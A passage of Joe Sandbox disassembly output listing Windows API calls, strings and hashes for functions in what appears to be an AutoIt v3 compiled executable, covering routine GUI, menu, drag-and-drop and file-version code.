                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00448BEE
                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00448C1F
                            • _memset.LIBCMT ref: 00448C44
                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00448C8D
                            • _memset.LIBCMT ref: 00448CEC
                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00448D16
                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00448D6E
                            • SendMessageW.USER32(?,0000133D,?,?), ref: 00448E1B
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00448E3D
                            • GetMenuItemInfoW.USER32 ref: 00448E87
                            • SetMenuItemInfoW.USER32 ref: 00448EB4
                            • DrawMenuBar.USER32(?), ref: 00448EC3
                            • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 00448EEB
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                            • String ID: 0$`$
                            • API String ID: 1073566785-1801689331
                            • Opcode ID: 9531cebe62902caae515db6e95a89c48abb8eb1366b23ef6d89993f334e8516f
                            • Instruction ID: c0b1aca1b93058ca7186d2de3fe1599f2b0a2ed9377e500c639f936c9950d6d3
                            • Opcode Fuzzy Hash: 9531cebe62902caae515db6e95a89c48abb8eb1366b23ef6d89993f334e8516f
                            • Instruction Fuzzy Hash: AFE1B274901218AFEF209F50CC84EEF7B79EF06710F10815BFA15AA290DB789985CF69
                            APIs
                            • GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,0044A5FA,?,?,00000000,?), ref: 0044A903
                            • SetTextColor.GDI32(?,?), ref: 0044A907
                            • GetSysColorBrush.USER32 ref: 0044A91D
                            • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,0044A5FA,?,?,00000000,?,?), ref: 0044A928
                            • CreateSolidBrush.GDI32(?), ref: 0044A92D
                            • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0044A5FA,?,?,00000000,?,?), ref: 0044A945
                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0044A953
                            • SelectObject.GDI32(?,00000000), ref: 0044A964
                            • SetBkColor.GDI32(?,00000000), ref: 0044A96D
                            • SelectObject.GDI32(?,?), ref: 0044A97A
                            • InflateRect.USER32 ref: 0044A999
                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0044A9B0
                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0044A9C5
                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0044A9ED
                            • GetWindowTextW.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,0044A5FA,?,?,00000000,?,?), ref: 0044AA14
                            • InflateRect.USER32 ref: 0044AA32
                            • DrawFocusRect.USER32 ref: 0044AA3D
                            • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0044A5FA), ref: 0044AA4B
                            • SetTextColor.GDI32(?,00000000), ref: 0044AA53
                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0044AA67
                            • SelectObject.GDI32(?,0044A5FA), ref: 0044AA7E
                            • DeleteObject.GDI32(?), ref: 0044AA89
                            • SelectObject.GDI32(?,?), ref: 0044AA8F
                            • DeleteObject.GDI32(?), ref: 0044AA94
                            • SetTextColor.GDI32(?,?), ref: 0044AA9A
                            • SetBkColor.GDI32(?,?), ref: 0044AAA4
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                            • String ID:
                            • API String ID: 1996641542-0
                            • Opcode ID: 4faa364f0824b5f74f5e167273f5caf1aa342e0541f2459f09ece61043a42c9d
                            • Instruction ID: f2b5a850d0214c5fe8892bf3f7db4c5c4f41a8fad09d75db86a76b1d9cf33f34
                            • Opcode Fuzzy Hash: 4faa364f0824b5f74f5e167273f5caf1aa342e0541f2459f09ece61043a42c9d
                            • Instruction Fuzzy Hash: DC517B75800208FFEB109FA4DC49EAEBBB9EF09320F114626F911AB2A1D7759D50CF94
                            APIs
                            • GetCursorPos.USER32(?), ref: 004449CA
                            • GetDesktopWindow.USER32 ref: 004449DF
                            • GetWindowRect.USER32(00000000), ref: 004449E6
                            • GetWindowLongW.USER32(?,000000F0), ref: 00444A48
                            • DestroyWindow.USER32 ref: 00444A74
                            • CreateWindowExW.USER32 ref: 00444A9D
                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00444ABB
                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00444AE1
                            • SendMessageW.USER32(?,00000421,?,?), ref: 00444AF6
                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00444B09
                            • IsWindowVisible.USER32(?), ref: 00444B29
                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00444B44
                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00444B58
                            • GetWindowRect.USER32(?,?), ref: 00444B70
                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00444B96
                            • GetMonitorInfoW.USER32(00000000,?), ref: 00444BB0
                            • CopyRect.USER32(?,?), ref: 00444BC7
                            • SendMessageW.USER32(?,00000412,00000000), ref: 00444C32
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                            • String ID: ($0$tooltips_class32
                            • API String ID: 698492251-4156429822
                            • Opcode ID: 7883d45501261ac6acb1cf483ca61a1428f0c4a0f4225c9cbb00ff280d7a867a
                            • Instruction ID: f6d5b00ab873f379faa04828e8b726c6c47baebaf77cbb533c69a8fb37be9235
                            • Opcode Fuzzy Hash: 7883d45501261ac6acb1cf483ca61a1428f0c4a0f4225c9cbb00ff280d7a867a
                            • Instruction Fuzzy Hash: 3EB16B71604340AFEB04DF64C848B6BBBE4FB89314F01891EF5999B291DB75EC05CB59
                            APIs
                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004244AC
                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004244D2
                            • _wcscpy.LIBCMT ref: 00424500
                            • _wcscmp.LIBCMT ref: 0042450B
                            • _wcscat.LIBCMT ref: 00424521
                            • _wcsstr.LIBCMT ref: 0042452C
                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00424548
                            • _wcscat.LIBCMT ref: 00424591
                            • _wcscat.LIBCMT ref: 00424598
                            • _wcsncpy.LIBCMT ref: 004245C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                            • API String ID: 699586101-1459072770
                            • Opcode ID: d0a510dee4b2b6626f2dcceae83d800760ccd2c681a4bcc2d4b36e652687c439
                            • Instruction ID: ca316a4e60c237a8a2300981ed8e787530a8134c5587f51fecd9a0ae69c36a8c
                            • Opcode Fuzzy Hash: d0a510dee4b2b6626f2dcceae83d800760ccd2c681a4bcc2d4b36e652687c439
                            • Instruction Fuzzy Hash: 0641F931A402607BE715AB759C47FFF77ACDF82710F50016BF905EA1C2EA789A0186AD
                            APIs
                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003C28BC
                            • GetSystemMetrics.USER32(00000007), ref: 003C28C4
                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003C28EF
                            • GetSystemMetrics.USER32(00000008), ref: 003C28F7
                            • GetSystemMetrics.USER32(00000004), ref: 003C291C
                            • SetRect.USER32 ref: 003C2939
                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 003C2949
                            • CreateWindowExW.USER32 ref: 003C297C
                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 003C2990
                            • GetClientRect.USER32(00000000,000000FF), ref: 003C29AE
                            • GetStockObject.GDI32(00000011), ref: 003C29CA
                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 003C29D5
                              • Part of subcall function 003C2344: GetCursorPos.USER32(?), ref: 003C2357
                              • Part of subcall function 003C2344: ScreenToClient.USER32(004857B0,?), ref: 003C2374
                              • Part of subcall function 003C2344: GetAsyncKeyState.USER32 ref: 003C2399
                              • Part of subcall function 003C2344: GetAsyncKeyState.USER32 ref: 003C23A7
                            • SetTimer.USER32(00000000,00000000,00000028,003C1256), ref: 003C29FC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                            • String ID: AutoIt v3 GUI
                            • API String ID: 1458621304-248962490
                            • Opcode ID: a062dbd146ccfb21d00414eb746d54a47abbb70e37ab65bff9f5de57f332b3ce
                            • Instruction ID: 90d449577992112e9242cffa743892e95fd146c5e63f16fb541851d4e306f579
                            • Opcode Fuzzy Hash: a062dbd146ccfb21d00414eb746d54a47abbb70e37ab65bff9f5de57f332b3ce
                            • Instruction Fuzzy Hash: E2B16B75A4020AEFDB15EFA8CD45FAE7BB4FB08310F118129FA15E62A0DB74AC51CB54
                            APIs
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                            • DragQueryPoint.SHELL32(?,?), ref: 0044C627
                              • Part of subcall function 0044AB37: ClientToScreen.USER32(?,?), ref: 0044AB60
                              • Part of subcall function 0044AB37: GetWindowRect.USER32(?,?), ref: 0044ABD6
                              • Part of subcall function 0044AB37: PtInRect.USER32(?,?,0044C014), ref: 0044ABE6
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0044C690
                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0044C69B
                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0044C6BE
                            • _wcscat.LIBCMT ref: 0044C6EE
                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044C705
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0044C71E
                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0044C735
                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0044C757
                            • DragFinish.SHELL32(?), ref: 0044C75E
                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0044C851
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$`$$pbH
                            • API String ID: 169749273-3007670085
                            • Opcode ID: ee1db23c8cfbe94322094ed6938bb3415bad7bcae621176ba58a3f04471acd2c
                            • Instruction ID: d34a3086effc22a43aac5a3667caa0ed0be4d8d45f4a39ff778986eb04bc3528
                            • Opcode Fuzzy Hash: ee1db23c8cfbe94322094ed6938bb3415bad7bcae621176ba58a3f04471acd2c
                            • Instruction Fuzzy Hash: 6A618D71108300AFD701EF64CC85EAFBBE8EF89350F40492EF595971A1DB30AA49CB5A
                            APIs
                            • GetClassNameW.USER32(?,?,00000100), ref: 0041A47A
                            • __swprintf.LIBCMT ref: 0041A51B
                            • _wcscmp.LIBCMT ref: 0041A52E
                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0041A583
                            • _wcscmp.LIBCMT ref: 0041A5BF
                            • GetClassNameW.USER32(?,?,00000400), ref: 0041A5F6
                            • GetDlgCtrlID.USER32 ref: 0041A648
                            • GetWindowRect.USER32(?,?), ref: 0041A67E
                            • GetParent.USER32(?), ref: 0041A69C
                            • ScreenToClient.USER32(00000000), ref: 0041A6A3
                            • GetClassNameW.USER32(?,?,00000100), ref: 0041A71D
                            • _wcscmp.LIBCMT ref: 0041A731
                            • GetWindowTextW.USER32(?,?,00000400), ref: 0041A757
                            • _wcscmp.LIBCMT ref: 0041A76B
                              • Part of subcall function 003E362C: _iswctype.LIBCMT ref: 003E3634
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                            • String ID: %s%u
                            • API String ID: 3744389584-679674701
                            • Opcode ID: fdfdc06d70323cf2874ce74cd5905841ab35c0a7ba9ade9e9bc9709e76bdc3cf
                            • Instruction ID: 2b731a7e13c7da1385d28671c907442fa676b1a158c821a2187b3d92be4fb5c8
                            • Opcode Fuzzy Hash: fdfdc06d70323cf2874ce74cd5905841ab35c0a7ba9ade9e9bc9709e76bdc3cf
                            • Instruction Fuzzy Hash: 2AA1D531205606AFD715DF60C884FEBB7E8FF44314F04452AF9A9C6290D738EAA5CB96
                            APIs
                            • GetClassNameW.USER32(00000008,?,00000400), ref: 0041AF18
                            • _wcscmp.LIBCMT ref: 0041AF29
                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 0041AF51
                            • CharUpperBuffW.USER32(?,00000000), ref: 0041AF6E
                            • _wcscmp.LIBCMT ref: 0041AF8C
                            • _wcsstr.LIBCMT ref: 0041AF9D
                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0041AFD5
                            • _wcscmp.LIBCMT ref: 0041AFE5
                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 0041B00C
                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0041B055
                            • _wcscmp.LIBCMT ref: 0041B065
                            • GetClassNameW.USER32(00000010,?,00000400), ref: 0041B08D
                            • GetWindowRect.USER32(00000004,?), ref: 0041B0F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                            • String ID: @$ThumbnailClass
                            • API String ID: 1788623398-1539354611
                            • Opcode ID: 303721a356feeabdee3d976d1494efaa517ce29b6ec2e548b113d5b85816663d
                            • Instruction ID: 25c99455ffcbbb0896d6783b1f0526e4b7c69376e8161bc827abd0d1baaa3987
                            • Opcode Fuzzy Hash: 303721a356feeabdee3d976d1494efaa517ce29b6ec2e548b113d5b85816663d
                            • Instruction Fuzzy Hash: 4F81B071108205AFDB01DF11C885FAB7BD8EF44354F04856AFD858A296DB38DD8ACBA5
                            APIs
                            • _memset.LIBCMT ref: 0044A259
                            • DestroyWindow.USER32 ref: 0044A2D3
                              • Part of subcall function 003C7BCC: _memmove.LIBCMT ref: 003C7C06
                            • CreateWindowExW.USER32 ref: 0044A34D
                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0044A36F
                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0044A382
                            • DestroyWindow.USER32 ref: 0044A3A4
                            • CreateWindowExW.USER32 ref: 0044A3DB
                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0044A3F4
                            • GetDesktopWindow.USER32 ref: 0044A40D
                            • GetWindowRect.USER32(00000000), ref: 0044A414
                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0044A42C
                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0044A444
                              • Part of subcall function 003C25DB: GetWindowLongW.USER32(?,000000EB), ref: 003C25EC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                            • String ID: 0$`$$tooltips_class32
                            • API String ID: 1297703922-3731353549
                            APIs
                            Strings
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                            • API String ID: 1038674560-1810252412
                            APIs
                            Similarity
                            • API ID: Cursor$Load$Info
                            • String ID:
                            • API String ID: 2577412497-0
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 00444424
                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044446F
                            Strings
                            Similarity
                            • API ID: BuffCharMessageSendUpper
                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                            • API String ID: 3974292440-4258414348
                            APIs
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                            • PostMessageW.USER32 ref: 0044C1FC
                            • GetFocus.USER32(?,?,?,?), ref: 0044C20C
                            • GetDlgCtrlID.USER32 ref: 0044C217
                            • _memset.LIBCMT ref: 0044C342
                            • GetMenuItemInfoW.USER32 ref: 0044C36D
                            • GetMenuItemCount.USER32(?), ref: 0044C38D
                            • GetMenuItemID.USER32(?,00000000), ref: 0044C3A0
                            • GetMenuItemInfoW.USER32 ref: 0044C3D4
                            • GetMenuItemInfoW.USER32 ref: 0044C41C
                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0044C454
                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0044C489
                            Strings
                            Similarity
                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                            • String ID: 0$`$
                            • API String ID: 1296962147-1801689331
                            APIs
                            • LoadImageW.USER32 ref: 0044B8B4
                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004491C2), ref: 0044B910
                            • LoadImageW.USER32 ref: 0044B949
                            • LoadImageW.USER32 ref: 0044B98C
                            • LoadImageW.USER32 ref: 0044B9C3
                            • FreeLibrary.KERNEL32(?), ref: 0044B9CF
                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0044B9DF
                            • DestroyIcon.USER32(?,?,?,?,?,004491C2), ref: 0044B9EE
                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0044BA0B
                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0044BA17
                              • Part of subcall function 003E2EFD: __wcsicmp_l.LIBCMT ref: 003E2F86
                            Strings
                            Similarity
                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                            • String ID: .dll$.exe$.icl
                            • API String ID: 1212759294-1154884017
                            APIs
                              • Part of subcall function 003C1B41: InvalidateRect.USER32(?,00000000,00000001), ref: 003C1B9A
                            • DestroyWindow.USER32 ref: 003C20D3
                            • KillTimer.USER32 ref: 003C216E
                            • DestroyAcceleratorTable.USER32(00000000,?,00000000,?,?,?,?,003C16CB,00000000,?,?,003C1AE2,?,?), ref: 003FBCA6
                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003C16CB,00000000,?,?,003C1AE2,?,?), ref: 003FBCD7
                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003C16CB,00000000,?,?,003C1AE2,?,?), ref: 003FBCEE
                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003C16CB,00000000,?,?,003C1AE2,?,?), ref: 003FBD0A
                            • DeleteObject.GDI32(00000000), ref: 003FBD1C
                            Strings
                            Similarity
                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                            • String ID: `$
                            • API String ID: 641708696-74666722
                            APIs
                              • Part of subcall function 003C9837: __itow.LIBCMT ref: 003C9862
                              • Part of subcall function 003C9837: __swprintf.LIBCMT ref: 003C98AC
                            • CharLowerBuffW.USER32(?,?), ref: 0042A3CB
                            • GetDriveTypeW.KERNEL32 ref: 0042A418
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0042A460
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0042A497
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0042A4C5
                              • Part of subcall function 003C7BCC: _memmove.LIBCMT ref: 003C7C06
                            Strings
                            Similarity
                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                            • API String ID: 2698844021-4113822522
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,003FE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0041F8DF
                            • LoadStringW.USER32(00000000,?,003FE029,00000001), ref: 0041F8E8
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,003FE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0041F90A
                            • LoadStringW.USER32(00000000,?,003FE029,00000001), ref: 0041F90D
                            • __swprintf.LIBCMT ref: 0041F95D
                            • __swprintf.LIBCMT ref: 0041F96E
                            • _wprintf.LIBCMT ref: 0041FA17
                            • MessageBoxW.USER32 ref: 0041FA2E
                            Strings
                            Similarity
                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                            • API String ID: 984253442-2268648507
                            APIs
                              • Part of subcall function 003C25DB: GetWindowLongW.USER32(?,000000EB), ref: 003C25EC
                            • GetSysColor.USER32(0000000F,?,?,?,?), ref: 003C21D3
                            Strings
                            Similarity
                            • API ID: ColorLongWindow
                            • String ID: `$
                            • API String ID: 259745315-74666722
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0044BA56
                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00449207,?,?,00000000,?), ref: 0044BA6D
                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00449207,?,?,00000000,?), ref: 0044BA78
                            • CloseHandle.KERNEL32(00000000), ref: 0044BA85
                            • GlobalLock.KERNEL32(00000000), ref: 0044BA8E
                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0044BA9D
                            • GlobalUnlock.KERNEL32(00000000), ref: 0044BAA6
                            • CloseHandle.KERNEL32(00000000), ref: 0044BAAD
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0044BABE
                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00452CAC,?), ref: 0044BAD7
                            • GlobalFree.KERNEL32(00000000), ref: 0044BAE7
                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0044BB0B
                            • CopyImage.USER32 ref: 0044BB36
                            • DeleteObject.GDI32(00000000), ref: 0044BB5E
                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0044BB74
                            Similarity
                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                            • String ID:
                            • API String ID: 3840717409-0
                            APIs
                            • __wsplitpath.LIBCMT ref: 0042DA10
                            • _wcscat.LIBCMT ref: 0042DA28
                            • _wcscat.LIBCMT ref: 0042DA3A
                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0042DA4F
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0042DA63
                            • GetFileAttributesW.KERNEL32(?), ref: 0042DA7B
                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 0042DA95
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0042DAA7
                            Strings
                            Similarity
